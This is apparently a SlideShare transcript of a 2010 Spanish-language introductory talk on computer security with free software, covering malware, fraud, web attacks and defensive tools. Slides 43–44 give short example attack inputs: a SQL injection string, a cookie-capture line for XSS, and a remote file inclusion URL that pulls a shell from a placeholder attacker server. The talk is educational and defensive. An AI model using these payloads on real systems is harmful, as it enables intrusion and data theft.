Seguridad informatica Con Software Libre
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Seguridad informatica Con Software Libre

on

  • 1,641 views

Ponencia "Seguridad informatica con software libre" para la "Flisol Arequipa 2010" por Juan Alfredo Salas Santillana".

Ponencia "Seguridad informatica con software libre" para la "Flisol Arequipa 2010" por Juan Alfredo Salas Santillana".

Statistics

Views

Total Views
1,641
Views on SlideShare
1,595
Embed Views
46

Actions

Likes
0
Downloads
77
Comments
0

2 Embeds 46

http://www.slideshare.net 45
http://10.10.23.84 1

Accessibility

Categories

Upload Details

Uploaded via as OpenOffice

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Seguridad informatica Con Software Libre Presentation Transcript

  • 1. Seguridad Informatica con Software Libre
      Juan Alfredo Salas Santillana
  • 2. AGENDA
    • ¿Seguridad Informatica?
    • 3. Nivel Usuario
    • 4. - Tipos de Amenazas - Algunos Numeros
    • 5. - Medidas Basicas a Tomar
    • 6. Nivel Administrador, Desarrollador – Servidores
    • 7. - Tipos de Ataques - Factores Fisicos y Otros
    • 8. - Medidas Basicas a Tomar - Como Ocultarte
    • 9. Algunas Demostraciones
    • 10. Ethical Hacking
    • 11. Recomendaciones
  • 12. ¿Seguridad Informatica?
      Integridad Confidencialidad Disponibilidad No Repudio
  • 13. Tipos de Amenazas
    • Malware
    • 14. Fraudes
  • 15. Amenazas: Malware
    • Virus
    • 16. Keyloggers
    • 17. Troyanos
    • 18. Gusanos
    • 19. Spyware
    • 20. Rootkits
  • 21. Malware: Virus
      Destruccion Replicación mediante usuario
  • 22. Malware: Keyloggers
      Capturan: -Pulsación de Teclas -Clicks del Mouse
  • 23. Malware: Troyanos
      Era un Metodo de Infección Procesos Ocultos Administración Remota Se Juntan con Aplicaciones Utiles
  • 24. Malware: Gusanos
      Autoreplicacion Autopropagación Aprobechan bugs
  • 25. Malware: Spyware
      Recolectan: Cache, Contraseñas Usualmente son barras
  • 26. Malware: Rootkits
      - Consiguen: Privilegios - Permiten Correr Programas como Root (Administrador)
  • 27. Amenaza: Fraude
    • Phishing
    • 28. Phraming
    • 29. Skimming
    • 30. Ingenieria Social Como Tal
  • 31. Fraude: Phishing
      Pesca Victimas Robar Información Por: Email (SPAM)
  • 32. Fraude: Pharming
      Envia a una Pagina falsa Modifica: ”Hosts” ”Cache de DNS”
  • 33. Fraude: Skimming
      Clonación de Tarjetas Mediante Cajeros
  • 34. Fraude: Ingenieria Social
      Usar la Palabra para convencer Principios: A Todo nos Gusta que nos Alagen No nos Gusta Decir ”NO” Siempre un Gesto de Confianza
  • 35. Medidas Basicas
    • Antivirus
    • 36. Firewall
    • 37. Filtro AntiSpam
  • 38. Medidas Basicas: Antivirus CLAMAV - Plataforma: Windows - Licencia: GPL - Monitoreo Permanente - Actualizaciones Frecuentes - No Consume Mucha Memoria Dr. Web (Livecd) - Plataforma: GNU / Linux - Licencia: GPL - Modo: Booteo - Analiza fuera de Windows
  • 39. Medidas Basicas: Firewall
      Aislamiento Registro de Uso Reglas de Transmision
  • 40. Algunos Numeros
      Virus Indetectable: $100 - $300 Cuenta de Correo Robado: $10 - $100 Tarjeta de Credito Robada: $1000
  • 41. Tipos de Ataques
      DOS Mediante Web Explotación de bugs
  • 42. Ataques: DOS
      Tratan de Colapsar un Servicio Algunos Abren Gran Cantidad de sockets Algunos Realizados Desde una ”Netbot”
  • 43. Ataques: Mediante Web
      Inyeccion SQL Filtrado Incorrecto de Variables Ejemplo: '' OR '1'='1'
      XSS Filtrado Incorrecto de Etiquetas No Afecta en si al Servidor, Solo al Usuario Ejemplo: $cookie = $_GET['cookie'];
  • 44. Ataques: Mediante Web
      CSRF Explota la Confianza de la Aplicacion a un Usuario
      RFI Explotable por la mala programacion de ”Include()” Ejemplo: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls
  • 45. Ataques: Explotacion de Bugs
      Usan Vulnerabilidades conocidas Se corre un script Puede ser Relizado por un Aprendiz
  • 46. Medidas Basicas
    • Firewall
    • 47. Test de Penetración
    • 48. Filtrado de Variables
  • 49. Medidas Basicas: Firewall
      IPTABLES Incluido en el Kernel Linux Registro de Logs
      FIRESTARTER Licencia: GPL Facil manejo y configuración
  • 50. Medidas Basicas: Test de Pentración
      NMAP Escaner de puertos, SO y mas. Licencia: GPL
      METASPLOIT F. Framework que permite explotar vulnerabilidades.
      NESSUS Escaner de vulnerabilidades
  • 51. Medidas Basicas: Filtrado de Variables
  • 52. Factores Fisicos y Otros
      Incendios Inundaciones Robo Fisico Defectos y Daños de Hardware
  • 53. Como Ocultarte
      Tor
  • 54. Algunas Demostraciones
  • 55. Ethical Hacking
      Pasion Libertad Conciencia Social "Ningún problema debería resolverse 2 veces"
  • 56. Recomendaciones
      Nada es 100% Seguro Filtrar tu Informacion Encripta tu Informacion Revisa tus Logs Nunca Pienses que Nadie se Tomara el Trabajo de Hacerlo